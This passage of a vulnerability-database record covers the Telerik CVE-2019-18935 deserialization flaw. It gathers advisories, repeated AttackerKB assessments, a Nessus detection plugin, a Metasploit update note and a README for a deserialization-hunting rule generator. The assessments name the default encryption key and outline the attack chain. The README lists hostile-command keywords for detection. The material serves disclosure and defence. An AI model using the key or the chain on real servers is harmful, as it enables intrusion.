a brief look at the details provided about the recent Australian Cyber attack, a lot can be learned about the techniques used by threat actors, and many conclusions can be drawn. Among the most significant is that even advanced \u201cstate based\u201d actors will make use of readily available exploits and attack code. Although the [mitigation recommendations from the ACSC](<https://www.cyber.gov.au/acsc/view-all-content/advisories/advisory-2020-008-copy-paste-compromises-tactics-techniques-and-procedures-used-target-multiple-australian-networks>) are well advised, the use of a well configured WAF can serve as an extra layer of protection. This is where the deployment of the Imperva WAF could make all the difference to your business.\n\nThe post [Australian Cyber Attack Vectors Blocked Out of the Box by Imperva WAF](<https://www.imperva.com/blog/australian-cyber-attack-vectors-blocked-out-of-the-box-by-imperva-cloud-waf/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-07-06T15:01:00", "type": "impervablog", "title": "Australian Cyber Attack Vectors Blocked Out of the Box by Imperva WAF", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11317", "CVE-2019-18935", "CVE-2019-19781"], "modified": "2020-07-06T15:01:00", "id": "IMPERVABLOG:BB987E93C1A58280077D98CF497FD72D", "href": "https://www.imperva.com/blog/australian-cyber-attack-vectors-blocked-out-of-the-box-by-imperva-cloud-waf/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-03-23T22:05:34", "description": "Progress Telerik UI for ASP.NET AJAX through 2019.3.1023 contains a .NET deserialization vulnerability in the RadAsyncUpload function. This is exploitable when the encryption keys are known due to the presence of CVE-2017-11317 or CVE-2017-11357, or other means. Exploitation can result in remote code execution. (As of 2020.1.114, a default setting prevents the exploit. In 2019.3.1023, but not earlier versions, a non-default setting can prevent exploitation.)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-12-11T13:15:00", "type": "cve", "title": "CVE-2019-18935", "cwe": ["CWE-502"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11317", "CVE-2017-11357", "CVE-2019-18935"], "modified": "2020-10-20T22:15:00", "cpe": [], "id": "CVE-2019-18935", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-18935", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}], "attackerkb": [{"lastseen": "2022-01-18T20:32:04", "description": "Progress Telerik UI for ASP.NET AJAX through 2019.3.1023 contains a .NET deserialization vulnerability in the RadAsyncUpload function. This is exploitable when the encryption keys are known due to the presence of CVE-2017-11317 or CVE-2017-11357, or other means. Exploitation can result in remote code execution. (As of 2020.1.114, a default setting prevents the exploit. In 2019.3.1023, but not earlier versions, a non-default setting can prevent exploitation.)\n\n \n**Recent assessments:** \n \n**zeroSteiner** at February 05, 2020 6:37pm UTC reported:\n\nThis vulnerability originally outlined by [bishopfox](<https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui>) is a variation on CVE-2017-11317. The patch for CVE-2017-11317 introduced encryption on the object which prevents an attacker from modifying the object in such a way to achieve file upload as the original did. This mitigation, however uses a default value for the encryption key of `PrivateKeyForEncryptionOfRadAsyncUploadConfiguration` that if left unchanged can be used to encrypt an object to reproduce similar conditions to CVE-2017-11317. With the ability to upload an arbitrary file, a Mixed Mode Assembly can be uploaded to achieve RCE through the deserializeation functionality in `JavaScriptSerializer.\n\nUsers should change their encryption key (as [recommended](<https://docs.telerik.com/devtools/aspnet-ajax/controls/asyncupload/security?_ga=2.98618715.414867971.1580929998-674280231.1580929998>) by Telerik) to a strong password and restart their server to mitigate this vulnerability. At that point an attacker would have to recover that secret value to leverage this attack chain. Versions after and including R2 2017 SP1 are not configured with a default encryption key, making exploiting this dependent on recovering the key through another means.\n\nMitigation Strength set to 3/5 due to it being dependent on the strength of the password.\n\n**ccondon-r7** at October 13, 2020 4:47pm UTC reported:\n\nThis vulnerability originally outlined by [bishopfox](<https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui>) is a variation on CVE-2017-11317. The patch for CVE-2017-11317 introduced encryption on the object which prevents an attacker from modifying the object in such a way to achieve file upload as the original did. This mitigation, however uses a default value for the encryption key of `PrivateKeyForEncryptionOfRadAsyncUploadConfiguration` that if left unchanged can be used to encrypt an object to reproduce similar conditions to CVE-2017-11317. With the ability to upload an arbitrary file, a Mixed Mode Assembly can be uploaded to achieve RCE through the deserializeation functionality in `JavaScriptSerializer.\n\nUsers should change their encryption key (as [recommended](<https://docs.telerik.com/devtools/aspnet-ajax/controls/asyncupload/security?_ga=2.98618715.414867971.1580929998-674280231.1580929998>) by Telerik) to a strong password and restart their server to mitigate this vulnerability. At that point an attacker would have to recover that secret value to leverage this attack chain. Versions after and including R2 2017 SP1 are not configured with a default encryption key, making exploiting this dependent on recovering the key through another means.\n\nMitigation Strength set to 3/5 due to it being dependent on the strength of the password.\n\n**gwillcox-r7** at October 20, 2020 6:59pm UTC reported:\n\nThis vulnerability originally outlined by [bishopfox](<https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui>) is a variation on CVE-2017-11317. The patch for CVE-2017-11317 introduced encryption on the object which prevents an attacker from modifying the object in such a way to achieve file upload as the original did. This mitigation, however uses a default value for the encryption key of `PrivateKeyForEncryptionOfRadAsyncUploadConfiguration` that if left unchanged can be used to encrypt an object to reproduce similar conditions to CVE-2017-11317. With the ability to upload an arbitrary file, a Mixed Mode Assembly can be uploaded to achieve RCE through the deserializeation functionality in `JavaScriptSerializer.\n\nUsers should change their encryption key (as [recommended](<https://docs.telerik.com/devtools/aspnet-ajax/controls/asyncupload/security?_ga=2.98618715.414867971.1580929998-674280231.1580929998>) by Telerik) to a strong password and restart their server to mitigate this vulnerability. At that point an attacker would have to recover that secret value to leverage this attack chain. Versions after and including R2 2017 SP1 are not configured with a default encryption key, making exploiting this dependent on recovering the key through another means.\n\nMitigation Strength set to 3/5 due to it being dependent on the strength of the password.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-12-11T00:00:00", "type": "attackerkb", "title": "CVE-2019-18935", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11317", "CVE-2017-11357", "CVE-2019-18935"], "modified": "2021-07-27T00:00:00", "id": "AKB:90DDDBF9-EA58-4470-B821-C35007A64BD6", "href": "https://attackerkb.com/topics/ZA24eUeDg5/cve-2019-18935", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2022-04-12T16:58:24", "description": "Progress Telerik UI for ASP.NET AJAX through 2019.3.1023 contains a .NET deserialization vulnerability in the RadAsyncUpload function. This is exploitable when the encryption keys are known due to the presence of CVE-2017-11317 or CVE-2017-11357, or other means. Exploitation can result in remote code execution. (As of 2020.1.114, a default setting prevents the exploit. In 2019.3.1023, but not earlier versions, a non-default setting can prevent exploitation.)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-04-24T00:00:00", "type": "nessus", "title": "Telerik UI for ASP.NET AJAX RadAsyncUpload .NET Deserialization Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11317", "CVE-2017-11357", "CVE-2019-18935"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:telerik:ui_for_asp.net_ajax"], "id": "TELERIK_UI_FOR_ASPNET_AJAX_CVE-2019-18935.NASL", "href": "https://www.tenable.com/plugins/nessus/135970", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(135970);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2019-18935\");\n script_xref(name:\"IAVA\", value:\"2020-A-0219\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Telerik UI for ASP.NET AJAX RadAsyncUpload .NET Deserialization Vulnerability\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application development suite installed on the remote Windows\nhost is affected by a deserialization vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"Progress Telerik UI for ASP.NET AJAX through 2019.3.1023 contains a .NET deserialization vulnerability \nin the RadAsyncUpload function. This is exploitable when the encryption keys are known due to \nthe presence of CVE-2017-11317 or CVE-2017-11357, or other means. Exploitation can result \nin remote code execution. (As of 2020.1.114, a default setting prevents the exploit. \nIn 2019.3.1023, but not earlier versions, a non-default setting can prevent exploitation.)\");\n # https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?de2ce6ef\");\n # https://docs.telerik.com/devtools/aspnet-ajax/controls/asyncupload/security?&_ga=2.224762457.29387225.1587722153-1707628900.1586272484#allowedcustommetadatatypes\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?be6fd178\");\n # https://docs.telerik.com/devtools/aspnet-ajax/controls/asyncupload/security\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?57e10c1e\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Telerik UI for ASP.NET AJAX version R3 2019 SP1\n(2019.3.1023) or later, and enable the type whitelisting feature of RadAsyncUpload.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-18935\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/12/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/12/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/04/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:telerik:ui_for_asp.net_ajax\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"telerik_ui_for_aspnet_ajax_installed.nbin\");\n script_require_keys(\"installed_sw/Telerik UI for ASP.NET AJAX\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude('install_func.inc');\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\n\nvar app_name = 'Telerik UI for ASP.NET AJAX';\nvar opt_in = FALSE;\nvar install = get_single_install(app_name:app_name, exit_if_unknown_ver:TRUE);\n\nvar version = install['version'];\nvar path = install['path'];\n\n# 2010.1.309 and earlier not affected \nif (ver_compare(ver:version, fix:'2010.1.309.0', strict:FALSE) <= 0)\n audit(AUDIT_INST_PATH_NOT_VULN, app_name, version, path);\n\n# 2020.1.114 and later have default settings available\nif (ver_compare(ver:version, fix:'2020.1.114.0', strict:FALSE) >= 0)\n audit(AUDIT_INST_PATH_NOT_VULN, app_name, version, path);\n\n# 2019.3.1023 has opt-in settings available, but not by default\nif ((ver_compare(ver:version, fix:'2019.3.1023', strict:FALSE) >= 0) &&\n (ver_compare(ver:version, fix:'2020.1.114.0', strict:FALSE) <= 0))\n{\n opt_in = TRUE;\n}\n\nif (opt_in)\n{\n # if version is 2019.3.1023 or higher, but lower than 2020.1.114.0, \n # type whitelisting feature of RadAsyncUpload needs to be enabled manually.\n # so if we're paranoid, we add a note to the report\n # (done below) and if we're not paranoid, we audit out\n if (report_paranoia < 2) audit(AUDIT_PARANOID);\n}\n\nvar port = get_kb_item('SMB/transport');\nif (empty_or_null(port))\n port = 445;\n\nvar report = report_items_str(\n report_items:make_array(\n 'Path', path,\n 'Installed version', version,\n 'Fixed version', '2019.3.1023'\n ),\n ordered_fields:make_list('Path', 'Installed version', 'Fixed version')\n);\n\nif (opt_in)\n report += '\\n\\n' + 'Although the type whitelisting feature of RadAsyncUpload is available for this version,' +\n '\\n' + 'we are not able to determine if this is actually enabled. Following the advisory,' +\n '\\n' + 'you should ensure that this is the case.';\n\nsecurity_report_v4(port:port, severity:SECURITY_HOLE, extra:report);\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-14T16:20:54", "description": "According to its self-reported version number, the version of Telerik UI for ASP.NET AJAX prior to 2019.3.1023 contains a .NET deserialization vulnerability in the RadAsyncUpload function. This is exploitable when the encryption keys are known due to the presence of CVE-2017-11317 or CVE-2017-11357, or other means. Exploitation can result in remote code execution. As of 2020.1.114, a default setting prevents the exploit. In 2019.3.1023, but not earlier versions, a non-default setting can prevent exploitation.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-07-01T00:00:00", "type": "nessus", "title": "Telerik UI for ASP.NET AJAX RadAsyncUpload .NET Deserialization Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11317", "CVE-2017-11357", "CVE-2019-18935"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:telerik:ui_for_asp.net_ajax:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_112521", "href": "https://www.tenable.com/plugins/was/112521", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "rapid7blog": [{"lastseen": "2020-10-28T04:47:53", "description": "\n\nMetasploit keeping that developer awareness rate up.\n\n\n\nThanks to [mr_me](<https://github.com/stevenseeley>) & [wvu](<https://github.com/wvu-r7>), SharePoint is an even better target to find in your next penetration test. The newly minted module can net you a shell and a copy of the servers config, making that report oh so much more fun.\n\nLike to escape the sandbox? WizardOpium has your first taste of freedom. Brought to you by [timwr](<https://github.com/timwr>) and friends through Chrome, [this module](<https://github.com/rapid7/metasploit-framework/blob/4fb0c4ac8ab89575c4358d2369d3650bc3e1c10d/modules/exploits/multi/browser/chrome_object_create.rb>) might be that push you need to get out onti solid ground.\n\n## New modules (4)\n\n * [Login to Another User with Su on Linux / Unix Systems](<https://github.com/rapid7/metasploit-framework/pull/14179>) by [Gavin Youker](<https://github.com/youkergav>)\n * [Microsoft SharePoint Server-Side Include and ViewState RCE](<https://github.com/rapid7/metasploit-framework/pull/14265>) by [wvu](<https://github.com/wvu-r7>) and [mr_me](<https://github.com/stevenseeley>), which exploits [CVE-2020-16952](<https://attackerkb.com/topics/4yGC4tLK2x/cve-2020-16952-microsoft-sharepoint-remote-code-execution-vulnerabilities?referrer=wrapup>)\n * [Telerik UI ASP.NET AJAX RadAsyncUpload Deserialization](<https://github.com/rapid7/metasploit-framework/pull/14229>) by [Alvaro Mu\u00f1oz](<https://github.com/pwntester>), [Caleb Gross](<https://github.com/noperator>), [Markus Wulftange](<https://github.com/mwulftange>), [Oleksandr Mirosh](<https://twitter.com/olekmirosh>), [Paul Taylor](<https://github.com/bao7uo>), [Spencer McIntyre](<https://github.com/zeroSteiner>), and [straightblast](<https://github.com/straightblast>), which exploits [CVE-2019-18935](<https://attackerkb.com/topics/ZA24eUeDg5/cve-2019-18935?referrer=wrapup>)\n * [Microsoft Windows Uninitialized Variable Local Privilege Elevation](<https://github.com/rapid7/metasploit-framework/pull/13817>) by [piotrflorczyk](<https://github.com/piotrflorczyk>), [timwr](<https://github.com/timwr>), and [unamer](<https://github.com/unamer>), which exploits [CVE-2019-1458](<https://attackerkb.com/topics/2i67dR7P4e/cve-2019-1458?referrer=wrapup>)\n\n## Enhancements and features\n\n * [Add version check to exchange_ecp_dlp_policy](<https://github.com/rapid7/metasploit-framework/pull/14289>) by [wvu](<https://github.com/wvu-r7>) adds extended version checks for SharePoint and Exchange servers as used by the exploit modules for [CVE-2020-16875](<https://attackerkb.com/topics/Y2azzfAbid/cve-2020-16875?referrer=wrapup>) and [CVE-2020-16952](<https://attackerkb.com/topics/4yGC4tLK2x/cve-2020-16952-microsoft-sharepoint-remote-code-execution-vulnerabilities?referrer=wrapup>).\n * [Parameterize args to popen3()](<https://github.com/rapid7/metasploit-framework/pull/14288>) by [Justin Steven](<https://github.com/justinsteven>) improves commands executed during `apk` generation commands to be more explicit with options.\n * [More improved doc and syntax](<https://github.com/rapid7/metasploit-framework/pull/14258>) by [h00die](<https://github.com/h00die>) adds documentation and code quality changes for multiple modules. As always docs improvement are greatly appreciated!\n * [Add tab completion for `run` command](<https://github.com/rapid7/metasploit-framework/pull/14240>) by [cgranleese-r7](<https://github.com/cgranleese-r7>) adds tab completion for specifying inline options when using the `run` command. For example, within Metasploit's console typing `run` and then hitting the tab key twice will now show all available option names. Incomplete option names and values can also be also suggested, for example `run LHOST=` and then hitting the tab key twice will show all available LHOST values.\n * [CVE-2019-1458 chrome sandbox escape](<https://github.com/rapid7/metasploit-framework/pull/13817>) by [timwr](<https://github.com/timwr>) adds support for exploiting [CVE-2019-1458](<https://attackerkb.com/topics/2i67dR7P4e/cve-2019-1458?referrer=wrapup>), aka WizardOpium, as both a standalone LPE module, and as a sandbox escape option for the `exploit/multi/browser/chrome_object_create.rb` module that exploits [CVE-2018-17463](<https://attackerkb.com/topics/fgJVNLkV6f/cve-2018-17463?referrer=wrapup>) in Chrome, thereby allowing users to both elevate their privileges on affected versions of Windows, as well as potentially execute a full end to end attack chain to go from a malicious web page to SYSTEM on systems running vulnerable versions of Chrome and Windows.\n * [Parameterize args to popen3()](<https://github.com/rapid7/metasploit-framework/pull/14288>) by [Justin Steven](<https://github.com/justinsteven>) improves commands executed during `apk` generation commands to be more explicit with options.\n * [More improved doc and syntax](<https://github.com/rapid7/metasploit-framework/pull/14258>) by [h00die](<https://github.com/h00die>) adds documentation and code quality changes for multiple modules. As always, docs improvements are greatly appreciated!\n\n## Bugs fixed\n\n * [MS17-010 improvements for SMB1 clients](<https://github.com/rapid7/metasploit-framework/pull/14290>) by [Spencer McIntyre](<https://github.com/zeroSteiner>) fixes an issue with the exploit/windows/smb/ms17_010_eternalblue module that was preventing sessions from being obtained successfully.\n * [Fix missing TLV migration from strings -> ints](<https://github.com/rapid7/metasploit-payloads/pull/441>) by [Justin Steven](<https://github.com/justinsteven>) converts a missed TLV conversion for COMMAND_ID_CORE_CHANNEL_CLOSE for PHP payloads.\n * [Meterpreter endless loop](<https://github.com/rapid7/metasploit-payloads/pull/439>) by [vixfwis](<https://github.com/vixfwis>), ensured that Meterpreter can properly handle SOCKET_ERROR on recv.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from GitHub:\n\n * [Pull Requests 6.0.11...6.0.12](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222020-10-13T14%3A57%3A09-05%3A00..2020-10-22T09%3A00%3A02-05%3A00%22>)\n * [Full diff 6.0.11...6.0.12](<https://github.com/rapid7/metasploit-framework/compare/6.0.11...6.0.12>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. To install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the [binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {}, "published": "2020-10-23T18:56:55", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-17463", "CVE-2019-1458", "CVE-2019-18935", "CVE-2020-16875", "CVE-2020-16952"], "modified": "2020-10-23T18:56:55", "id": "RAPID7BLOG:E8EB68630D38C60B7DE4AF696474210D", "href": "https://blog.rapid7.com/2020/10/23/metasploit-wrap-up-84/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "kitploit": [{"lastseen": "2022-05-12T21:31:10", "description": "[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh96iyLi-WJuKHxzsUe2ew0LLbVkwXkKoWXWpcZ0mRX6YUdBo7uzVq0lxIihLA9awRncMpRG3Pz54Becx4VdqrQLs5gSE0N0eXTFeY3SvASRKmLUj29WSoNXUB9oiczpcdLkgyqQmTBmYpjyy432kXPM87zwjhA7s0hfpa0u5aqBPpNFNzCyggYVI4E/s1882/deserialization1.png>)\n\n \n\n\nProgrammatically create hunting rules for deserialization [exploitation](<https://www.kitploit.com/search/label/Exploitation> \"exploitation\" ) with multiple\n\n * keywords (e.g. cmd.exe)\n * gadget chains (e.g. CommonsCollection)\n * object types (e.g. ViewState, Java, Python Pickle, PHP)\n * encodings (e.g. Base64, raw)\n * rule types (e.g. Snort, Yara)\n\n \n\n\n### Disclaimer\n\nRules generated by this tool are intended for hunting/research purposes and are not designed for high fidelity/blocking purposes.\n\nPlease _test thoroughly_ before deploying to any production systems.\n\nThe Yara rules are primarily intended for scanning web server logs. Some of the \"object prefixes\" are only 2 bytes long, so they can make large scans a bit slow. _(Translation: please don't drop them all into VT Retrohunt.)_\n\n### Usage\n\nHelp: `python3 heyserial.py -h`\n\nExamples:\n \n \n python3 heyserial.py -c 'ExampleChain::condition1+condition2' -t JavaObj python3 heyserial.py -k cmd.exe whoami 'This file cannot be run in DOS mode' python3 heyserial.py -k Process.Start -t NETViewState -e base64 \"base64+utf16le\" \n\n# Utils\n\n### utils/checkyoself.py\n\nThis is a tool to automate bulk testing of Snort and Yara rules on a variety of sample files.\n\nUsage: `python3 checkyoself.py [-y rules.yara] [-s rules.snort] [-o file_output_prefix] [--matches] [--misses] -d malware.exe malware.pcap`\n\nExamples: `python3 checkyoself.py -y rules/javaobj -s rules/javaobj -d payloads/javaobj pcaps --misses -o java_misses`\n\n### utils/generate_payloads.ps1\n\nYSoSerial.NET v1.34 payload generation. Run on Windows from the ./utils directory.\n\n * Source: <https://github.com/pwntester/ysoserial.net>\n * License: ysoserial.net_LICENSE.txt\n\n### utils/generate_payloads.sh\n\nYSoSerial payload generation. Run on Linux from the ./utils directory.\n\n * Source: <https://github.com/frohoff/ysoserial>\n * License: ysoserial_LICENSE.txt\n\n### utils/install_snort.sh\n\nInstalling Snort on a Debian based system was a bit finnicky for me, so I wrote my install notes here.\n\n_Use at your own risk _in a VM_ that _you have snapshotted recently_._\n\n### utils/server.py\n\nSimple Python script that runs an HTTP server on 127.0.0.1:12345 and accepts POST requests.\n\nHandy for generating test PCAPs.\n\n# License\n\nCopyright (C) 2021 Alyssa Rahman, Mandiant, Inc. All Rights Reserved. Licensed under the Apache License, Version 2.0 (the \"License\"); you may not use this file except in compliance with the License. You may obtain a copy of the License at: [package root]/LICENSE.txt Unless required by applicable law or agreed to in writing, software [distributed](<https://www.kitploit.com/search/label/Distributed> \"distributed\" ) under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.\n\n# Contributing\n\nCheck out the Developers' guide (DEVELOPERS.md) for more details on extending HeySerial!\n\n# Prior Work/Related Resources\n\nTools\n\n * [Deserialization-Cheat-Sheet](<https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet> \"Deserialization-Cheat-Sheet\" ) \u2013 @GrrrDog\n * [Ysoserial](<https://github.com/frohoff/ysoserial> \"Ysoserial\" ) \\- @frohoff\n * [MarshalSec](<https://github.com/frohoff/marshalsec> \"MarshalSec\" ) \\- @frohoff\n * [Ysoserial (forked)](<https://github.com/wh1t3p1g/ysoserial> \"Ysoserial \\(forked\\)\" ) \\- @wh1t3p1g\n * [Ysoserial.NET](<https://github.com/pwntester/ysoserial.net> \"Ysoserial.NET\" ) and [v2 branch](<https://github.com/pwntester/ysoserial.net/tree/v2> \"v2 branch\" ) \\- @pwntester\n * [ViewGen](<https://github.com/0xacb/viewgen> \"ViewGen\" ) \u2013 0xacb\n * [Rogue-JNDI](<https://github.com/veracode-research/rogue-jndi> \"Rogue-JNDI\" ) \\- @veracode-research\n\nVulnerabilities\n\n * Log4J ([CVE-2021-44228](<https://www.lunasec.io/docs/blog/log4j-zero-day/> \"CVE-2021-44228\" ))\n * Exchange ([CVE-2021-42321](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42321> \"CVE-2021-42321\" ))\n * Zoho ManageEngine ([CVE-2020-10189](<https://nvd.nist.gov/vuln/detail/CVE-2020-10189> \"CVE-2020-10189\" ))\n * Jira ([CVE-2020-36239](<https://oxalis.io/atlassian-jira-data-centers-critical-vulnerability-what-you-need-to-know/> \"CVE-2020-36239\" ))\n * Telerik ([CVE-2019-18935](<https://bishopfox.com/blog/cve-2019-18935-remote-code-execution-in-telerik-ui> \"CVE-2019-18935\" ))\n * C1 CMS ([CVE-2019-18211](<https://medium.com/@frycos/yet-another-net-deserialization-35f6ce048df7> \"CVE-2019-18211\" ))\n * Jenkins ([CVE-2016-9299](<https://nvd.nist.gov/vuln/detail/CVE-2016-9299> \"CVE-2016-9299\" ))\n * [What Do WebLogic, WebSphere, JBoss, Jenkins, OpenNMS, and Your Application Have in Common? This Vulnerability.](<https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/> \"What Do WebLogic, WebSphere, JBoss, Jenkins, OpenNMS, and Your Application Have in Common? This Vulnerability.\" ) \u2013 @breenmachine, FoxGloveSecurity (2015)\n\nTalks and Write-Ups\n\n * [PSA: Log4Shell and the current state of JNDI injection](<https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Injection/> \"PSA: Log4Shell and the current state of JNDI injection\" ) \\- Moritz Bechler (2021)\n * [This is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits](<https://www.mandiant.com/resources/apt41-initiates-global-intrusion-campaign-using-multiple-exploits> \"This is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits\" ) \u2013 Chris Glyer, Dan Perez, Sarah Jones, Steve Miller (2020)\n * [Deep Dive into .NET ViewState deserialization and its 